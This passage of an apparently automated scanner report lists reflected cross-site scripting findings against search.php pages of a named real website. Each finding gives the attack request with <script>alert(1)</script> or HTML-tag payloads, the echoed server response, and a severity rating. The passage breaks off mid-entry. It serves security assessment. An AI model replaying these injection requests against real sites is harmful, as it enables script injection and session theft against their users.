Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:46:23 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/other/themes/kosmos/search.php6eccc<script>alert(1)</script>2281b465b4a?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5225. http://www.resellerbase.com/web-service/other/themes/kosmos/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/web-service/other/themes/kosmos/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 93462<a>faf8c337c8b was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /web-service/other/themes/kosmos/search.php?keyword=search...&Submit3=Search93462<a>faf8c337c8b&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/other/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:43:52 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/other/themes/kosmos/search.php?keyword=search...&Submit3=Search93462<a>faf8c337c8b&opt=2 was not found on this server.</p>
...[SNIP]...

2.5226. http://www.resellerbase.com/web-service/other/themes/kosmos/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/web-service/other/themes/kosmos/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload a6e6d<a>3c948d1f1f7 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /web-service/other/themes/kosmos/search.php?keyword=search...a6e6d<a>3c948d1f1f7&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/other/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:43:37 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/other/themes/kosmos/search.php?keyword=search...a6e6d<a>3c948d1f1f7&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5227. http://www.resellerbase.com/web-service/other/themes/kosmos/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/other/themes/kosmos/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload ffd7c<script>alert(1)</script>e4fff6292ee was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/other/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2&ffd7c<script>alert(1)</script>e4fff6292ee=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/other/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:45:09 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/other/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2&ffd7c<script>alert(1)</script>e4fff6292ee=1 was not found on this server.</p>
...[SNIP]...

2.5228. http://www.resellerbase.com/web-service/other/themes/kosmos/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/web-service/other/themes/kosmos/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload c505f<a>a36a8ffb5bc was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /web-service/other/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2c505f<a>a36a8ffb5bc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/other/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:44:07 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/other/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2c505f<a>a36a8ffb5bc was not found on this server.</p>
...[SNIP]...

2.5229. http://www.resellerbase.com/web-service/other/themes/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/other/themes/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 35093<script>alert(1)</script>a18e333b8d0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service35093<script>alert(1)</script>a18e333b8d0/other/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/other/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:45:35 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service35093<script>alert(1)</script>a18e333b8d0/other/themes/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5230. http://www.resellerbase.com/web-service/other/themes/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/other/themes/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload c03a4<script>alert(1)</script>69c56e68e8b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/otherc03a4<script>alert(1)</script>69c56e68e8b/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/other/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:45:44 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/otherc03a4<script>alert(1)</script>69c56e68e8b/themes/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5231. http://www.resellerbase.com/web-service/other/themes/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/other/themes/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 7324d<script>alert(1)</script>5ace756329b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/other/themes7324d<script>alert(1)</script>5ace756329b/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/other/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:45:56 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/other/themes7324d<script>alert(1)</script>5ace756329b/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5232. http://www.resellerbase.com/web-service/other/themes/search.php [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/other/themes/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload ca56b<script>alert(1)</script>015123381ca was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/other/themes/search.phpca56b<script>alert(1)</script>015123381ca?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/other/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:46:07 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/other/themes/search.phpca56b<script>alert(1)</script>015123381ca?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5233. http://www.resellerbase.com/web-service/other/themes/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/web-service/other/themes/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 3c621<a>a8724b9a631 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /web-service/other/themes/search.php?keyword=search...&Submit3=Search3c621<a>a8724b9a631&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/other/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:43:46 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/other/themes/search.php?keyword=search...&Submit3=Search3c621<a>a8724b9a631&opt=2 was not found on this server.</p>
...[SNIP]...

2.5234. http://www.resellerbase.com/web-service/other/themes/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/web-service/other/themes/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload d48da<a>6f15a8a36f9 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /web-service/other/themes/search.php?keyword=search...d48da<a>6f15a8a36f9&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/other/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:43:31 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/other/themes/search.php?keyword=search...d48da<a>6f15a8a36f9&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5235. http://www.resellerbase.com/web-service/other/themes/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/other/themes/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 96f5e<script>alert(1)</script>4496c4ad79 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/other/themes/search.php?keyword=search...&Submit3=Search&opt=2&96f5e<script>alert(1)</script>4496c4ad79=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/other/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:45:07 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/other/themes/search.php?keyword=search...&Submit3=Search&opt=2&96f5e<script>alert(1)</script>4496c4ad79=1 was not found on this server.</p>
...[SNIP]...

2.5236. http://www.resellerbase.com/web-service/other/themes/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/web-service/other/themes/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 20b83<a>09df4897c8c was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /web-service/other/themes/search.php?keyword=search...&Submit3=Search&opt=220b83<a>09df4897c8c HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/other/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:44:04 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/other/themes/search.php?keyword=search...&Submit3=Search&opt=220b83<a>09df4897c8c was not found on this server.</p>
...[SNIP]...

2.5237. http://www.resellerbase.com/web-service/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/search.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ba83f"><script>alert(1)</script>14c39a1dc63d2ecda was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /web-serviceba83f"><script>alert(1)</script>14c39a1dc63d2ecda/search.php?cat=3&keyword=search...&Submit3=Search&opt=1&sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/search.php?cat=3&keyword=search...&Submit3=Search&opt=1
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:57:10 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 59047

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by categories
...[SNIP]...
<a href="/web-serviceba83f"><script>alert(1)</script>14c39a1dc63d2ecda/search.php?cat=3&keyword=search...&Submit3=Search&opt=1&sort_by=title&sort_order=asc/more2.html" style="color: ">
...[SNIP]...

2.5238. http://www.resellerbase.com/web-service/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload babcd<script>alert(1)</script>fad309d5e13 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-servicebabcd<script>alert(1)</script>fad309d5e13/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:51:45 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-servicebabcd<script>alert(1)</script>fad309d5e13/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5239. http://www.resellerbase.com/web-service/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/search.php

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 40ec9"><script>alert(1)</script>04a2df4e23d2a01f2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /web-service/search.php40ec9"><script>alert(1)</script>04a2df4e23d2a01f2?cat=3&keyword=search...&Submit3=Search&opt=1&sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/search.php?cat=3&keyword=search...&Submit3=Search&opt=1
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:57:32 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 59047

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by categories
...[SNIP]...
<a href="/web-service/search.php40ec9"><script>alert(1)</script>04a2df4e23d2a01f2?cat=3&keyword=search...&Submit3=Search&opt=1&sort_by=title&sort_order=asc/more2.html" style="color: ">
...[SNIP]...

2.5240. http://www.resellerbase.com/web-service/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 9e829<script>alert(1)</script>5cf41c406b0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/search.php9e829<script>alert(1)</script>5cf41c406b0?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:51:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/search.php9e829<script>alert(1)</script>5cf41c406b0?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5241. http://www.resellerbase.com/web-service/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/web-service/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload f7d9e<a>ec8940300c0 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /web-service/search.php?keyword=search...&Submit3=Searchf7d9e<a>ec8940300c0&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:50:13 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/search.php?keyword=search...&Submit3=Searchf7d9e<a>ec8940300c0&opt=2 was not found on this server.</p>
...[SNIP]...

2.5242. http://www.resellerbase.com/web-service/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/web-service/search.php

